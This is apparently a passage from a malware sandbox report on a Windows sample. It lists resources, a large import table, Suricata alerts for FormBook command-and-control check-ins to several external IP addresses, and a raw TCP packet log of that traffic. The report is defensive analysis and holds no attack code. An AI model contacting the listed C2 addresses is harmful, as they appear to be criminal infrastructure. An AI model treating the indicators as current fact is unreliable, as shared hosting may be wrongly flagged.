RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x55609	data			1.0003317081540155
RT_GROUP_ICON	0x121dc4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x121e3c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x121e50	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x121e64	0x14	data	English	Great Britain	1.25
RT_VERSION	0x121e78	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x121f54	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-24T08:13:05.360687+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49803	161.97.168.245	80	TCP
2024-11-24T08:13:05.360687+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49803	161.97.168.245	80	TCP
2024-11-24T08:13:23.188575+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49845	27.124.4.246	80	TCP
2024-11-24T08:13:25.829233+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49851	27.124.4.246	80	TCP
2024-11-24T08:13:28.485540+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49857	27.124.4.246	80	TCP
2024-11-24T08:13:31.110419+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49863	27.124.4.246	80	TCP
2024-11-24T08:13:31.110419+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49863	27.124.4.246	80	TCP
2024-11-24T08:13:38.954469+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49883	149.88.81.190	80	TCP
2024-11-24T08:13:41.626315+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49889	149.88.81.190	80	TCP
2024-11-24T08:13:44.298121+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49895	149.88.81.190	80	TCP
2024-11-24T08:14:07.393960+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49902	149.88.81.190	80	TCP
2024-11-24T08:14:07.393960+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49902	149.88.81.190	80	TCP
2024-11-24T08:14:15.220013+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49967	85.159.66.93	80	TCP
2024-11-24T08:14:17.891846+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49973	85.159.66.93	80	TCP
2024-11-24T08:14:20.563785+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49979	85.159.66.93	80	TCP
2024-11-24T08:14:23.128933+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49986	85.159.66.93	80	TCP
2024-11-24T08:14:23.128933+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49986	85.159.66.93	80	TCP
2024-11-24T08:14:30.104854+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49987	185.27.134.144	80	TCP
2024-11-24T08:14:32.766640+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49988	185.27.134.144	80	TCP
2024-11-24T08:14:35.517068+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49989	185.27.134.144	80	TCP
2024-11-24T08:14:38.188508+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49990	185.27.134.144	80	TCP
2024-11-24T08:14:38.188508+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49990	185.27.134.144	80	TCP
2024-11-24T08:14:45.532572+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49991	172.67.145.234	80	TCP
2024-11-24T08:14:47.949610+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49992	172.67.145.234	80	TCP
2024-11-24T08:14:50.602328+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49993	172.67.145.234	80	TCP
2024-11-24T08:14:53.273537+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49994	172.67.145.234	80	TCP
2024-11-24T08:14:53.273537+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49994	172.67.145.234	80	TCP
2024-11-24T08:15:00.280976+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49995	172.67.167.146	80	TCP
2024-11-24T08:15:02.945910+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49996	172.67.167.146	80	TCP
2024-11-24T08:15:05.598869+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49997	172.67.167.146	80	TCP
2024-11-24T08:15:08.316038+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	49998	172.67.167.146	80	TCP
2024-11-24T08:15:08.316038+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	49998	172.67.167.146	80	TCP
2024-11-24T08:15:15.532547+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	49999	154.88.22.110	80	TCP
2024-11-24T08:15:18.188878+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	50000	154.88.22.110	80	TCP
2024-11-24T08:15:20.860837+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.9	50001	154.88.22.110	80	TCP
2024-11-24T08:15:23.516537+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.9	50002	154.88.22.110	80	TCP
2024-11-24T08:15:23.516537+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.9	50002	154.88.22.110	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:13:03.891047001 CET	49803	80	192.168.2.9	161.97.168.245
Nov 24, 2024 08:13:04.010585070 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:04.013638973 CET	49803	80	192.168.2.9	161.97.168.245
Nov 24, 2024 08:13:04.023580074 CET	49803	80	192.168.2.9	161.97.168.245
Nov 24, 2024 08:13:04.143747091 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:05.360497952 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:05.360518932 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:05.360529900 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:05.360563040 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:05.360687017 CET	49803	80	192.168.2.9	161.97.168.245
Nov 24, 2024 08:13:05.365811110 CET	49803	80	192.168.2.9	161.97.168.245
Nov 24, 2024 08:13:05.485285044 CET	80	49803	161.97.168.245	192.168.2.9
Nov 24, 2024 08:13:21.588366985 CET	49845	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:21.707976103 CET	80	49845	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:21.708125114 CET	49845	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:21.728193998 CET	49845	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:21.847743988 CET	80	49845	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:23.145857096 CET	80	49845	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:23.188575029 CET	49845	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:23.235517979 CET	49845	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:24.254781961 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:24.374403954 CET	80	49851	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:24.374527931 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:24.390343904 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:24.510009050 CET	80	49851	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:25.775538921 CET	80	49851	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:25.829232931 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:25.891846895 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:25.977045059 CET	80	49851	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:25.977124929 CET	49851	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:26.910438061 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:27.029958963 CET	80	49857	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:27.030097961 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:27.053759098 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:27.173264980 CET	80	49857	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:27.173343897 CET	80	49857	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:28.431194067 CET	80	49857	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:28.485539913 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:28.563674927 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:28.632745028 CET	80	49857	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:28.632807016 CET	49857	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:29.582707882 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:29.702245951 CET	80	49863	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:29.702349901 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:29.712353945 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:29.831813097 CET	80	49863	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:31.067595005 CET	80	49863	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:31.110419035 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:31.260648966 CET	80	49863	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:31.260775089 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:31.261722088 CET	49863	80	192.168.2.9	27.124.4.246
Nov 24, 2024 08:13:31.381211996 CET	80	49863	27.124.4.246	192.168.2.9
Nov 24, 2024 08:13:37.316453934 CET	49883	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:37.436002970 CET	80	49883	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:37.436120987 CET	49883	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:37.452442884 CET	49883	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:37.571938992 CET	80	49883	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:38.954468966 CET	49883	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:39.116806030 CET	80	49883	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:39.974329948 CET	49889	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:40.093957901 CET	80	49889	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:40.094085932 CET	49889	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:40.112900972 CET	49889	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:40.233556986 CET	80	49889	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:41.626315117 CET	49889	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:41.788746119 CET	80	49889	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:42.644954920 CET	49895	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:42.765371084 CET	80	49895	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:42.765480995 CET	49895	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:42.781936884 CET	49895	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:42.901529074 CET	80	49895	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:42.901617050 CET	80	49895	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:44.298120975 CET	49895	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:44.460805893 CET	80	49895	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:45.317387104 CET	49902	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:45.436916113 CET	80	49902	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:45.437052965 CET	49902	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:45.447259903 CET	49902	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:13:45.566796064 CET	80	49902	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:59.313846111 CET	80	49883	149.88.81.190	192.168.2.9
Nov 24, 2024 08:13:59.313918114 CET	49883	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:14:02.073148012 CET	80	49889	149.88.81.190	192.168.2.9
Nov 24, 2024 08:14:02.073277950 CET	49889	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:14:04.673423052 CET	80	49895	149.88.81.190	192.168.2.9
Nov 24, 2024 08:14:04.673623085 CET	49895	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:14:07.393780947 CET	80	49902	149.88.81.190	192.168.2.9
Nov 24, 2024 08:14:07.393959999 CET	49902	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:14:07.394805908 CET	49902	80	192.168.2.9	149.88.81.190
Nov 24, 2024 08:14:07.514225960 CET	80	49902	149.88.81.190	192.168.2.9
Nov 24, 2024 08:14:13.576874971 CET	49967	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:13.696327925 CET	80	49967	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:13.699794054 CET	49967	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:13.715888023 CET	49967	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:13.835557938 CET	80	49967	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:15.220012903 CET	49967	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:15.339952946 CET	80	49967	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:15.340111971 CET	49967	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:16.238993883 CET	49973	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:16.358582973 CET	80	49973	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:16.360235929 CET	49973	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:16.376543999 CET	49973	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:16.496042967 CET	80	49973	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:17.891845942 CET	49973	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:18.011698008 CET	80	49973	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:18.011925936 CET	49973	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:18.911324978 CET	49979	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:19.030869961 CET	80	49979	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:19.032071114 CET	49979	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:19.048573971 CET	49979	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:19.168292046 CET	80	49979	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:19.168322086 CET	80	49979	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:20.563785076 CET	49979	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:20.683605909 CET	80	49979	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:20.683670044 CET	49979	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:21.583349943 CET	49986	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:21.703031063 CET	80	49986	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:21.703829050 CET	49986	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:21.713526011 CET	49986	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:21.834846020 CET	80	49986	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:23.128655910 CET	80	49986	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:23.128717899 CET	80	49986	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:23.128932953 CET	49986	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:23.131875038 CET	49986	80	192.168.2.9	85.159.66.93
Nov 24, 2024 08:14:23.251301050 CET	80	49986	85.159.66.93	192.168.2.9
Nov 24, 2024 08:14:28.736306906 CET	49987	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:28.855837107 CET	80	49987	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:28.855921984 CET	49987	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:28.872050047 CET	49987	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:28.991597891 CET	80	49987	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:30.104646921 CET	80	49987	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:30.104785919 CET	80	49987	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:30.104854107 CET	49987	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:30.376213074 CET	49987	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:31.395268917 CET	49988	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:31.514858007 CET	80	49988	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:31.515012980 CET	49988	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:31.531040907 CET	49988	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:31.650499105 CET	80	49988	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:32.766488075 CET	80	49988	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:32.766561031 CET	80	49988	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:32.766639948 CET	49988	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:33.032576084 CET	49988	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:34.056569099 CET	49989	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:34.176145077 CET	80	49989	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:34.176269054 CET	49989	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:34.191000938 CET	49989	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:34.310745955 CET	80	49989	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:34.310760021 CET	80	49989	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:35.516946077 CET	80	49989	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:35.517010927 CET	80	49989	185.27.134.144	192.168.2.9
Nov 24, 2024 08:14:35.517067909 CET	49989	80	192.168.2.9	185.27.134.144
Nov 24, 2024 08:14:35.704514980 CET	49989	80	192.168.2.9	185.27.134.144
